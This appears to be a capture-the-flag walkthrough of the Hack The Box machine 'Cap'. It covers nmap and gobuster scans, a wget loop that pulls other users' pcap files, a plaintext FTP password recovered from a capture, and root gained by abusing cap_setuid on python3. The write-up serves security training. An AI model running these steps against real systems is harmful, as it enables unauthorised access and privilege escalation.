Skip to content

Cap

Port Scan

$ sudo nmap 10.10.10.245 -p- --min-rate=10000 -T4 -sCV
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 05:52 UTC
Warning: 10.10.10.245 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.245
Host is up (0.31s latency).
Not shown: 44899 closed tcp ports (reset), 20633 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn

Web APP

$ gobuster dir -u http://10.10.10.245/ -w /usr/share/wordlists/dirb/common.txt 
/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip                   (Status: 200) [Size: 17457]
/netstat              (Status: 200) [Size: 28836]

$ for i in {0..10} ; do wget 10.10.10.245/download/${i} -O pcaps/${i}.pcap 2>/dev/null || break; done; rm pcaps/${i}.pcap

in 0.pcap

alt text

nathan:Buck3tH4TF0RM3!

To root

One way to give a program some privileges without having it completely get the power of root is to use Linux capabilities. Python has been assigned two:

$ getcap /usr/bin/python3.8

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

$ python3
>>> import pty
>>> import os
>>> os.setuid(0)
>>> pty.spawn("bash")

alt text